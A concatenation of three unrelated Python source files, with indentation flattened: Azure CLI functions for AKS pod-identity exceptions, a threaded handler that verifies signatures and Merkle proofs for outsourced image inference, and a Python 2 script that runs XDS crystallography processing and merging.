pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
|
threadHandler.py
|
# This class initializes 3 threads to handle tasks in parallel to CNN inference
import sys
import socket
import traceback
import cv2
from imutils.video import VideoStream
import imagezmq
import threading
import numpy as np
import time
from nacl.signing import VerifyKey
from nacl.signing import SigningKey
from parameters import Parameters
import Responder as re
from merkletools import MerkleTools
import json
class ThreadHandler:
def __init__(self, hostname, port, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size, sendingPort):
self.hostname = hostname
self.port = port
self._stop = False
self._stop_message = ''
self._data = ''
self._data2 = ''
self._data3 = ''
self._data_ready = threading.Event()
self._data2_ready = threading.Event()
self._image_count = 0
self._received = threading.Event()
self._readyToReceive = threading.Event()
self._thread2 = threading.Thread(target=self._run, args=())
self._thread3 = threading.Thread(target=self._run2, args=(
merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size))
self._thread4 = threading.Thread(target=self._run3, args=(
merkle_tree_interval, contractHash, hostname, sendingPort))
self._thread2.daemon = True
self._thread3.daemon = True
self._thread4.daemon = True
self._thread2.start()
self._thread3.start()
self._thread4.start()
# Thread 2 (receiving) section
def receive(self, timeout=15.0):
flag = self._data_ready.wait(timeout=timeout)
if not flag:
if self._stop:
sys.exit()
else:
self._stop = True
self._stop_message = "Contract aborted in Thread2 waiting for new images: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review"
print(self._stop_message)
raise TimeoutError(
"Contract aborted in Thread2 waiting for new images: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review")
self._data_ready.clear()
return self._data
def _run(self):
receiver = imagezmq.ImageHub(
"tcp://{}:{}".format(self.hostname, self.port), REQ_REP=False)
while not self._stop:
self._data = receiver.recv_jpg()
self._data_ready.set()
receiver.close()
    # Thread 3 (decompressing, verifying, preprocessing) section
def _run2(self, merkle_tree_interval, contractHash, minimum_receive_rate_from_contractor, vk_Bytes, input_size):
vk = VerifyKey(vk_Bytes)
acknowledged_frames = 0
while not self._stop:
name, compressed = self.receive()
decompressedImage = cv2.imdecode(
np.frombuffer(compressed, dtype='uint8'), -1)
if name == 'abort':
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted by outsourcer according to custom'
print(self._stop_message)
sys.exit(self._stop_message)
if merkle_tree_interval == 0:
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-2]) + bytes(name[-1]), bytes(name[:-2]))
except:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
                        self._stop_message = 'Contract aborted: Outsourcer signature does not match input. Possible Consequences for Outsourcer: Blacklist, Bad Review'
print(self._stop_message)
sys.exit(self._stop_message)
if name[-1] < (self._image_count-2)*minimum_receive_rate_from_contractor or name[-1] < acknowledged_frames:
sys.exit(
                        'Contract aborted: Outsourcer did not acknowledge enough outputs. Possible Consequences for Outsourcer: Blacklist, Bad Review')
acknowledged_frames = name[-1]
else:
                # verify that the signature matches the image, contract hash, image count, number of intervals, and random number
try:
vk.verify(bytes(compressed) + contractHash +
bytes(name[-5]) + bytes(name[-4]) + bytes(name[-3]) + bytes(name[-2]) + bytes(name[-1]), bytes(name[:-5]))
except:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
                        self._stop_message = 'Contract aborted: Outsourcer signature does not match input. Possible Consequences for Outsourcer: Blacklist, Bad Review'
print(self._stop_message)
sys.exit(self._stop_message)
if name[-4] < (self._image_count-2)*minimum_receive_rate_from_contractor or name[-4] < acknowledged_frames:
sys.exit(
                        'Contract aborted: Outsourcer did not acknowledge enough outputs. Possible Consequences for Outsourcer: Blacklist, Bad Review')
acknowledged_frames = name[-4]
# image preprocessing
# region
original_image = cv2.cvtColor(decompressedImage, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(
original_image, (input_size, input_size)) # 0.4ms
image_data = image_data / 255. # 2.53ms
images_data = []
for i in range(1):
images_data.append(image_data)
images_data = np.asarray(images_data).astype(np.float32) # 3.15ms
self._data2 = (images_data, name, original_image)
self._data2_ready.set()
def receive2(self, timeout=15.0):
flag = self._data2_ready.wait(timeout=timeout)
        if not flag:
            if self._stop:
                sys.exit(self._stop_message)
            else:
                self._stop = True
                self._stop_message = "Contract aborted in Thread3 receiving from Thread2: Outsourcer timed out. Possible Consequences for Outsourcer: Blacklist, Bad Review"
                print(self._stop_message)
                raise TimeoutError(
                    "Contract aborted in Thread3 receiving from Thread2: Outsourcer timed out. Possible Consequences for Outsourcer: Blacklist, Bad Review")
self._data2_ready.clear()
return self._data2
# Thread 4 (signing, sending, displaying) section
def putData(self, data, timeout=15):
flag = self._readyToReceive.wait(timeout=timeout)
if not flag:
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = "Contract aborted in Thread1 waiting for Thread4: Outsourcer probably timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review"
print(self._stop_message)
raise TimeoutError(
"Contract aborted in Thread3 receving from Thread2: Outsourcer timed out. Possible Consquences for Outsourcer: Blacklist, Bad Review")
self._readyToReceive.clear()
self._data3 = data
self._received.set()
def _run3(self, merkle_tree_interval, contractHash, hostname, sendingPort):
self._readyToReceive.set()
sk = SigningKey(Parameters.private_key_self)
dont_show = Parameters.dont_show
        if Parameters.is_contractor:
display_name = 'Contractor'
else:
display_name = 'Verifier'
responder = re.Responder(hostname, sendingPort)
if merkle_tree_interval > 0:
mt = MerkleTools()
mtOld = MerkleTools()
interval_count = 0
mtOld_leaf_indices = {}
mt_leaf_indices = {}
current_challenge = 1
merkle_root = ''
last_challenge = 0
while not self._stop:
self._received.wait()
self._received.clear()
boxtext = self._data3[0]
image = self._data3[1]
name = self._data3[2]
self._image_count = self._data3[3]
if merkle_tree_interval == 0:
sig = sk.sign(boxtext.encode('latin1') +
contractHash).signature
sig = sig.decode('latin1')
# send reply
responder.respond(boxtext + ';--' + sig)
else:
image_count = self._image_count
                outsourcer_signature = name[:-5]
outsourcer_image_count = name[-5]
outsourcer_number_of_outputs_received = name[-4]
outsourcer_random_number = name[-3]
outsourcer_interval_count = name[-2]
outsourcer_time_to_challenge = bool(name[-1])
mt.add_leaf(boxtext, True)
mt_leaf_indices[outsourcer_image_count] = image_count % merkle_tree_interval
response = boxtext
# time to send a new merkle root
                # e.g. if interval = 128 then all responses from 0-127 are added to the merkle tree
if image_count > 1 and (image_count+1) % merkle_tree_interval == 0:
mt.make_tree()
merkle_root = mt.get_merkle_root()
sig = sk.sign(merkle_root.encode(
'latin1') + bytes(interval_count) + contractHash).signature # sign merkle root
                    # respond with merkle root
response += ';--' + str(merkle_root) + \
';--' + sig.decode('latin1')
interval_count += 1
mtOld = mt # save old merkle tree for challenge
mtOld_leaf_indices.clear()
mtOld_leaf_indices = mt_leaf_indices.copy() # save old indices for challenge
mt_leaf_indices.clear() # clear for new indices
mt = MerkleTools() # construct new merkle tree for next interval
else:
# if this is true then the outsourcer has not received the merkle root yet -> send again
if interval_count > outsourcer_image_count:
sig = sk.sign(merkle_root.encode(
'latin1') + bytes(interval_count) + contractHash).signature # sign merkle root
response += ';--' + str(merkle_root) + \
';--' + sig.decode('latin1')
                    else:  # in this case outsourcer has confirmed to have received the merkle root
                        # the outsourcer has sent a challenge against the old merkle tree; give the outsourcer 3 frames to confirm the challenge was received before sending again
if outsourcer_time_to_challenge and image_count - last_challenge > 3:
last_challenge = image_count
if outsourcer_random_number in mtOld_leaf_indices:
# if challenge can be found, send proof back
outsourcer_random_number_index = mtOld_leaf_indices[
outsourcer_random_number]
else:
# if challenge index cannot be found return leaf 0
outsourcer_random_number_index = 0
proofs = mtOld.get_proof(
outsourcer_random_number_index)
stringsend = ''
for proof in proofs:
stringsend += ';--' # indicate start of proof
stringsend += proof.__str__() # send proof
stringsend += ';--'
# send leaf
stringsend += mtOld.get_leaf(
outsourcer_random_number_index)
stringsend += ';--'
stringsend += mtOld.get_merkle_root() # send root
stringarr = []
stringarr = stringsend.split(';--')
leaf_node = stringarr[-2]
root_node = stringarr[-1]
proof_string = stringarr[0:-2]
sig = sk.sign(str(stringarr[1:]).encode('latin1') + bytes(
interval_count-1) + contractHash).signature # sign proof and contract details
# attach signature
response += ';--' + sig.decode('latin1')
response += stringsend # attach challenge response to response
responder.respond(response)
# display image
if not dont_show:
# image.show()
image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)
cv2.imshow(display_name, image)
if cv2.waitKey(1) == ord('q'):
responder.respond('abort12345:6')
if self._stop:
sys.exit(self._stop_message)
else:
self._stop = True
self._stop_message = 'Contract aborted: Contractor ended contract according to custom'
print(self._stop_message)
sys.exit(self._stop_message)
self._readyToReceive.set()
def close(self):
self._stop = True
# Simulating heavy processing load
def limit_to_2_fps():
    time.sleep(0.5)
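# A minimal sketch (an assumption, not part of the original file) of how a main inference
# loop is expected to drive ThreadHandler: Thread 2 receives frames, Thread 3 hands
# preprocessed batches to the caller via receive2(), and the caller pushes results to
# Thread 4 via putData(). Constructor arguments and run_inference() are placeholders.
#
#   handler = ThreadHandler(hostname='127.0.0.1', port=5555, merkle_tree_interval=0,
#                           contractHash=b'...', minimum_receive_rate_from_contractor=0.9,
#                           vk_Bytes=b'...', input_size=416, sendingPort=5556)
#   image_count = 0
#   while True:
#       images_data, name, original_image = handler.receive2()
#       boxtext = run_inference(images_data)  # hypothetical CNN inference step
#       handler.putData((boxtext, original_image, name, image_count))
#       image_count += 1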
|
sxdp_v1.py
|
'''
Date: Aug, 2017
S.Basu
'''
import os, sys, errno
import glob, time
import subprocess as sub
import h5py
import numpy as np
import multiprocessing as mp
import argparse, logging
import xds_input
import Merge_utls as merge
from cellprobe import Cell
from xscale_output import *
import matplotlib.pyplot as plt
class Xtal(object):
def __init__(self,xtalImgPath,xtalProcessPath,xtalNum, BL, tot_angle=360, **kwargs):
self.xtalimgpath = xtalImgPath
self.xtalprocesspath = xtalProcessPath
self.xtalnum = xtalNum
self.xtalname = None
self.osci = None
self.osci_range = tot_angle
self.datrange_str = None
self.bgrange_str = None
self.sprange_str = None
self.beamline = BL
self.SG = kwargs.get('SG', '0')
self.cell = kwargs.get('cell', "70 70 30 90 90 90")
self.res_cut = kwargs.get('res_cut', "2.5")
self.idx_res = kwargs.get('idx_res', "5.0")
self.friedel = kwargs.get('friedel', "FALSE")
self.refdata = kwargs.get('refdata', " ")
self.strong_pixel = kwargs.get('strong_pixel', '6.0')
self.min_pix_spot = kwargs.get('min_pix_spot', '3')
self.content = {}
def read_masterh5(self, master_file):
#read master file headers for xds.inp preparation
header = h5py.File(master_file, 'r')
#beam center x and y
beamx = header['/entry/instrument/detector/beam_center_x']
beamx = np.array(beamx);
self.content['beamX'] = beamx
beamy = header['/entry/instrument/detector/beam_center_y']
beamy = np.array(beamy)
self.content['beamY'] = beamy
#wavelength and detector distance
wave = header['/entry/instrument/beam/incident_wavelength']
wave = np.array(wave)
self.content['wavelength'] = wave
detZ = header['/entry/instrument/detector/detector_distance']
detZ = np.array(detZ)
self.content['detectorDistance'] = round(detZ*1e3) # convert distance into millimeter
#omega and oscillation
try:
omega = header['/entry/sample/goniometer/omega_increment']
omega = np.array(omega)
self.osci = omega
self.content['oscillationAngle'] = omega
except KeyError:
self.content['oscillationAngle'] = 0.1
#number of images
if self.osci_range is None:
nimages = header['/entry/instrument/detector/detectorSpecific/nimages']
nimages = np.array(nimages)
else:
nimages = round(float(self.osci_range)/self.osci)
nimages = int(nimages)
data_start = 1; data_end = nimages
#data_start = self.xtalnum*nimages + 1; data_end = (self.xtalnum+1)*nimages
self.datrange_str = (str(data_start), str(data_end))
self.sprange_str = self.datrange_str
self.bgrange_str = (str(data_start), str(data_start+10))
self.content['firstIndex'] = data_start; self.content['numFrames'] = nimages;
self.content['lastIndex'] = data_start+10
# xtal filename template with path
name = os.path.basename(master_file)
name = name.split( 'master' )
#self.xtalname = self.xtalimgpath + name[0]+"??????.h5"
img = name[0]+"??????.h5"
self.xtalname = os.path.join(self.xtalimgpath, img)
self.content['xtalname'] = self.xtalname;
def read_cbf(self, headerfile):
#read cbf file header and store the info in dictionary and later prepare xds.inp
cmd = "head -35 "+headerfile+" > filehead.txt"
sub.call(cmd, shell=True)
self.xtalname = headerfile[:-9]+"?????.cbf"
self.content['xtalname'] = self.xtalname
keys_head = ["Beam_xy","Wavelength", "Detector_distance","Angle_increment"]
fh = open('filehead.txt', 'r')
all_lines = fh.readlines()
fh.close()
for lines in all_lines:
if any(key in lines for key in keys_head):
line = lines.split()
if line[1] == 'Beam_xy':
self.content['beamX'] = str(line[2].strip('(').strip(','))
self.content['beamY'] = str(line[3].strip(')'))
elif line[1] == 'Wavelength':
self.content['wavelength'] = line[2]
elif line[1] == 'Detector_distance':
self.content["detectorDistance"] = str(float(line[2])*1e3)
else:
self.content["oscillationAngle"] = line[2]
self.content['numFrames'] = int(int(self.osci_range)/float(line[2]))
self.content['firstIndex'] = 1; self.content['lastIndex'] = 11;
def locatextalpath(self):
#Locate and sanity check if the data exists and then read the headers/master files
if not os.path.exists(self.xtalimgpath):
print 'Error: path does not exist\n'
sys.exit()
if self.beamline == "PXI":
master_file = glob.glob(os.path.join(self.xtalimgpath,"*_master.h5"))[0]
self.content['lib'] = '/exchange/mx/xds/library/dectris-neggia-centos6.so'
try:
self.read_masterh5(master_file)
except OSError:
raise OSError("master file may not exist\n")
elif self.beamline == "PXII" or self.beamline == "PXIII":
cbf_header = glob.glob(os.path.join(self.xtalimgpath,"*_00001.cbf"))[0]
try:
self.read_cbf(cbf_header)
except OSError:
raise OSError("cbf may not have collected yet\n")
def create_idx_inp(self):
try:
os.chdir(self.xtalprocesspath)
except OSError:
raise OSError("xtal process folder have not been created yet")
self.content['jobs']='XYCORR INIT COLSPOT IDXREF'
self.content['njobs'] = 4
try:
if os.environ['BEAMLINE_XNAME'] == 'X06SA':
self.content['nproc'] = 18
self.content['nodes'] = "x06sa-cn-117 x06sa-cn-118 x06sa-cn-119 x06sa-cn-120 x06sa-cn-121 x06sa-cn-122 x06sa-cn-123 x06sa-cn-124"
elif os.environ['BEAMLINE_XNAME'] == 'X06DA':
self.content['nproc'] = 12
self.content['nodes'] = "x06da-cn-1 x06da-cn-2"
elif os.environ['BEAMLINE_XNAME'] == 'X10SA':
self.content['nproc'] = 12
self.content['nodes'] = "x10sa-cn-1 x10sa-cn-2"
except KeyError:
if 'SLURM_NODELIST' in os.environ:
node_string = os.environ['SLURM_NODELIST']
node_num_list = node_string.strip('ra-c-[').strip(']').split('-')
self.content['nproc'] = 12
self.content['njobs'] = 2
self.content['nodes'] = 'ra-c-%s ra-c-%s' %(node_num_list[0], node_num_list[1])
if self.beamline == 'PXI':
sub.call(['module load dectris-neggia/17.09'], shell=True)
self.content['lib'] = os.path.join(os.environ['DECTRIS_NEGGIA_LIBRARY_DIR'], 'dectris-neggia.so')
else:
                print 'On Ra-cluster, salloc was not done, so using the login node; this will be slow\n'
self.content['nproc'] = 12
self.content['njobs'] = 1
self.content['nodes'] = 'ra-c-001 ra-c-002 ra-c-003 ra-c-0004'
if self.beamline == 'PXI':
sub.call(['module load dectris-neggia/17.09'], shell=True)
self.content['lib'] = os.environ['DECTRIS_NEGGIA_LIBRARY_DIR']
if self.refdata != " " and os.path.isfile(self.refdata):
ref_link = 'reference.HKL'
os.symlink(self.refdata, ref_link)
self.content['referenceData'] = ref_link
else:
self.content['referenceData'] = " "
self.content['SG'] = self.SG; self.content['unit_cell'] = self.cell;
self.content['friedel'] = self.friedel; self.content['highres'] = 5.0
self.content['strong_pixel'] = self.strong_pixel; self.content['min_pix_spot'] = self.min_pix_spot;
inp_string = xds_input.INP[self.beamline]
if not os.path.isfile("XDS.INP"):
fh = open("XDS.INP", 'w')
fh.write(inp_string.format(**self.content))
fh.close()
else:
pass
def create_integrate_inp(self):
try:
os.chdir(self.xtalprocesspath)
except OSError:
            raise OSError('xtal process folder may not have been created yet')
self.content['jobs'] = 'DEFPIX INTEGRATE CORRECT'
self.content['highres'] = self.res_cut
if os.path.isfile("XDS.INP"):
sub.call(["cp XDS.INP indexing.INP"], shell=True)
inp_string = xds_input.INP[self.beamline]
fh = open("XDS.INP",'w')
fh.write(inp_string.format(**self.content))
fh.close()
else:
pass
def check_allfiles(self):
if self.beamline == 'PXII' or self.beamline == 'PXIII':
if len(str(self.content['numFrames'])) == 3:
tmp_str = '00'+str(self.content['numFrames'])
else:
tmp_str = '0'+str(self.content['numFrames'])
lastImage = self.content['xtalname'].strip('?????.cbf')+tmp_str+'.cbf'
wait_max = self.content['numFrames']*10
wait = 0;
while not os.path.exists(lastImage):
time.sleep(10)
print("waiting for the last image: %s" %lastImage)
                wait += 10
if wait > wait_max:
print "all images were not saved, so processing timed out\n"
break
else:
pass
def runxds(self):
self.check_allfiles()
os.chdir(self.xtalprocesspath)
sub.call(['xds_par > /dev/null'], shell=True)
self.create_integrate_inp()
sub.call(['xds_par > /dev/null'], shell=True)
if not os.path.isfile("XDS_ASCII.HKL"):
print "xtal: %d failed from %s\n" %(self.xtalnum, self.xtalprocesspath),
else:
print "xtal: %d processed\n" %self.xtalnum,
class Process(object):
"""docstring for ClassName"""
def __init__(self, data_dir, output, BL, tot_angle=360):
self.data_folder = data_dir
self.process_folder = None
self.output = os.path.join(output, "proc")
if not os.path.exists(self.output):
os.makedirs(self.output, 0755)
else:
pass
self.nxtals = None
self.setname = None
self.setfolder = [];
self.dataName = None
self.process_folder = None
self.process_data = None
self.beamline = BL
self.ISa_th = 4.0
self.total_range = tot_angle
self.xscale_file_list = [];
self.xtals_lists = []
def Lookup(self):
if len(self.data_folder) == 0:
print "No image folder found \n"
return
for ii in range(len(self.data_folder)):
for dirs in sorted(glob.glob(os.path.join(self.data_folder[ii], "*set*"))):
if os.path.isdir(dirs) and len(os.listdir(dirs)) > 2:
self.setfolder.append(dirs)
return
def get_xtals(self, **kwargs):
for ii in range(len(self.data_folder)):
if self.data_folder[ii].endswith('*'):
parent_dir = self.data_folder[ii][:-1]
if not os.path.exists(parent_dir):
print "Error: data directory does not exist!\n"
sys.exit()
else:
if not os.path.exists(self.data_folder[ii]):
print "Error: data directory does not exist!\n"
sys.exit()
try:
os.chdir(self.output)
self.Lookup()
except OSError:
raise IOError("output path is not accessible\n")
self.nxtals = len(self.setfolder)
if self.nxtals > 0:
for k in range(self.nxtals):
self.setname = os.path.basename(self.setfolder[k])
dir_von_sets = os.path.dirname(self.setfolder[k])
self.dataName = os.path.basename(dir_von_sets)
self.process_folder = os.path.join(self.output, self.dataName, self.setname)
self.process_data = os.path.join(self.output, self.dataName)
if not os.path.isdir(self.process_folder):
print "creating processing directory %s\n" %(self.process_folder),
os.makedirs(self.process_folder, 0755)
os.chdir(self.process_folder)
xtalobj = Xtal(self.setfolder[k], self.process_folder,k, self.beamline, self.total_range, **kwargs)
xtalobj.locatextalpath()
xtalobj.create_idx_inp()
self.xtals_lists.append(xtalobj)
else:
print "folder may exist, skipping %s\n" %(self.process_folder),
os.chdir(self.output)
print "%d xtals have been found \n" %len(self.xtals_lists)
return
def get_serial_eiger_xtals(self, **kwargs):
for ii in range(len(self.data_folder)):
if self.data_folder[ii].endswith('*'):
parent_dir = self.data_folder[ii][:-1]
if not os.path.exists(parent_dir):
print "Error: data directory does not exist!\n"
sys.exit()
else:
if not os.path.exists(self.data_folder[ii]):
print "Error: data directory does not exist!\n"
sys.exit()
try:
os.chdir(self.output)
self.Lookup()
except OSError:
raise IOError("output path is not accessible\n")
if len(self.setfolder) > 0:
for i in range(len(self.setfolder)):
self.xtal_each_miniset = sorted(glob.glob(os.path.join(self.setfolder[i], "*data*.h5")))
self.nxtals = len(self.xtal_each_miniset) #num of xtals in each minisets
print "%d xtals in %s miniset \n" %(self.nxtals, self.setfolder[i]),
self.mininame = os.path.basename(self.setfolder[i])
dir_von_miniset = os.path.dirname(self.setfolder[i])
self.dataName = os.path.basename(dir_von_miniset)
puckname = os.path.basename(os.path.dirname(self.dataName))
self.process_data = os.path.join(self.output, puckname, self.dataName)
self.process_folder = os.path.join(self.output, puckname, self.dataName, self.mininame)
if not os.path.exists(self.process_folder):
print "creating processing directory %s" %(self.process_folder)
os.makedirs(self.process_folder, 0755)
else:
pass
os.chdir(self.process_folder)
for k in range(self.nxtals):
xtal_process_path = self.process_folder + '/xtal_' + str(k)
if not os.path.exists(xtal_process_path):
os.makedirs(xtal_process_path, 0755)
os.chdir(xtal_process_path)
xtalobj = Xtal(self.setfolder[i], xtal_process_path, k, self.beamline, self.total_range, **kwargs)
xtalobj.locatextalpath()
image_block = xtalobj.content['numFrames']
start_image = xtalobj.xtalnum*image_block+1
end_image = (xtalobj.xtalnum+1)*image_block
xtalobj.content['firstIndex'] = start_image
xtalobj.content['numFrames'] = end_image
xtalobj.content['lastIndex'] = start_image+10
xtalobj.create_idx_inp()
self.xtals_lists.append(xtalobj)
else:
print "folder may exist, skipping it %s\n" %xtal_process_path,
os.chdir(self.output)
print "\n %d xtals have been gathered\n" %len(self.xtals_lists)
return
def find_HKLs(self, **kwargs):
mergepaths = kwargs.get('mergepaths',[self.output])
try:
os.chdir(self.output)
except OSError:
print "check if the output folder exists\n"
for path in mergepaths:
for parent, dirs, files in os.walk(path):
for fh in files:
if fh == "XDS_ASCII.HKL":
HKLpath = os.path.join(parent,fh)
self.xscale_file_list.append(HKLpath)
else:
pass
return
def runeiger(self):
job_cnt = 0
if len(self.xtals_lists) > 0:
for j in range(len(self.xtals_lists)):
proc = [];
for i in range (0,4):
try:
jobid = mp.Process(target=self.xtals_lists[(j*4)+i].runxds)
proc.append(jobid)
except IndexError:
pass
for p in proc:
p.start()
for p in proc:
p.join()
print "%d crystals have been attempted\n" %((j+1))
def runpilatus(self, expt):
job_cnt = 0
if expt == 'native-sad':
try:
for j in range(len(self.xtals_lists)):
self.xtals_lists[j].runxds()
job_cnt += 1
print "%d crystals have been attempted\n" %job_cnt
except Exception:
raise Exception("no xtals found to run xds or other error, check\n")
elif expt == 'serial-xtal':
try:
for j in range(len(self.xtals_lists)):
proc = [];
for i in range (0,10):
try:
jobid = mp.Process(target=self.xtals_lists[(j*10)+i].runxds)
proc.append(jobid)
except IndexError:
pass
for p in proc:
p.start()
for p in proc:
p.join()
print "%d crystals have been attempted\n" %(j+1)
except Exception:
raise
def options():
parser = argparse.ArgumentParser()
parser.add_argument("--image_path", type=str, nargs='+', \
help="provide path for each well, containing minisets folder or provide path for parent folder, containing all wells, e.g. your/path/to/parent/<well-id> or your/path/to/parent")
parser.add_argument("--output_dir", type=str, \
help="provide path where processing stuffs will be dumped using identical directory tree")
parser.add_argument("--BeamID", type=str, help="Beamline ID needs to be specified, eg. PXI or PXII\n")
parser.add_argument("--method", type=str, help="Mention either native-sad or serial-xtal\n")
parser.add_argument("--total_degree", type=str, help="provide angular range to process.It's mutually exclusive with start/end_omega keywords")
parser.add_argument("--SG_num", type=str, default="0", \
help="optionally, Space-group number can be specified, default is 0")
parser.add_argument("--cell", type=str, default="70 70 30 90 90 90", \
help="optionally, unit-cell can be specified as 70 70 30 90 90 90; otherwise it will try to determine by itself")
parser.add_argument("--highres", type=str, default="2.5", \
help="optionally high-resolution limit can be given, default: 2.5")
parser.add_argument("--friedel", type=str, default="FALSE", help="optionally, it can be changed to true..")
parser.add_argument("--refs", type=str, help='optionally, reference data set for indexing can be provided..')
parser.add_argument("--strong_pixel", type=str)
parser.add_argument("--min_pix_spot", type=str)
parser.add_argument("--ISa_cutoff", type=str, default= "3.0")
parser.add_argument("--merge_paths", type=str, nargs='+')
args = parser.parse_args()
return args
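# Example invocation (a sketch, not taken from the source; the script name, paths and
# space-group number below are placeholders for a typical serial-xtal run on PXI):
#
#   python <this_script>.py --image_path /data/parent/well-1 \
#       --output_dir /data/proc --BeamID PXI --method serial-xtal \
#       --total_degree 360 --SG_num 19 --cell "70 70 30 90 90 90" --highres 2.0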
def main():
args = options()
    if args.image_path is None:
        sys.exit("you didn't tell me where data is\n")
    if args.output_dir is None:
        print "no output path provided, dumping everything in current directory\n"
        args.output_dir = os.getcwd()
    if args.BeamID is None:
        sys.exit("Beamline has to be mentioned, e.g. PXI, PXII, or PXIII\n")
    if args.total_degree is None:
        args.total_degree = 360
    if args.method is None:
        sys.exit("Please specify the method, either native-sad or serial-xtal\n")
keywords = {}
    if args.SG_num is not None:
        keywords['SG'] = args.SG_num
    if args.cell is not None:
        keywords['cell'] = args.cell
    if args.highres is not None:
        keywords['res_cut'] = args.highres
    if args.friedel is not None:
        keywords['friedel'] = args.friedel
    if args.refs is not None:
        keywords['refdata'] = args.refs
    if args.strong_pixel is not None:
        keywords['strong_pixel'] = args.strong_pixel
    if args.min_pix_spot is not None:
        keywords['min_pix_spot'] = args.min_pix_spot
    merge_keys = {}
    if args.ISa_cutoff is not None:
        merge_keys['isa_cut'] = args.ISa_cutoff
    if args.highres is not None:
        merge_keys['res_cut'] = args.highres
    merge_hkls = {}
    if args.merge_paths is not None:
        merge_hkls['mergepaths'] = args.merge_paths[0].split()
proc = Process(args.image_path, args.output_dir, args.BeamID, args.total_degree)
if proc.beamline == "PXI" and args.method == 'serial-xtal':
proc.get_serial_eiger_xtals(**keywords)
else:
proc.get_xtals(**keywords)
if proc.beamline == "PXI":
proc.runeiger()
else:
proc.runpilatus(args.method)
#Merging with Merge_utls..
proc.find_HKLs(**merge_hkls)
mm = merge.Merge_utls(sorted(proc.xscale_file_list), args.method, **merge_keys)
results = mm.run_()
if args.method == 'native-sad':
try:
print "No selection table with xtals: %d\n" %results['xtals_found']
print_table(results['nSAD_xscale_stats'])
            print '\nISa selection table with xtals: %d\n' %results['xtals_after_isa']
print_table(results['ISa_selection'])
except KeyError:
print "Either ISa-select is not set or XSCALE stats not found\n"
else:
try:
print "No selection table with xtals: %d\n" %results['xtals_found']
print_table(results['no_selection'])
print '\nISa selection table with xtals: %d\n' %results['xtals_after_isa']
print_table(results['ISa_selection'])
print '\nCell selection table with xtals: %d\n' %results['xtals_after_cell']
print_table(results['cell_selection'])
print '\npair-CC selection table with xtals: %d\n' %results['xtals_after_pCC']
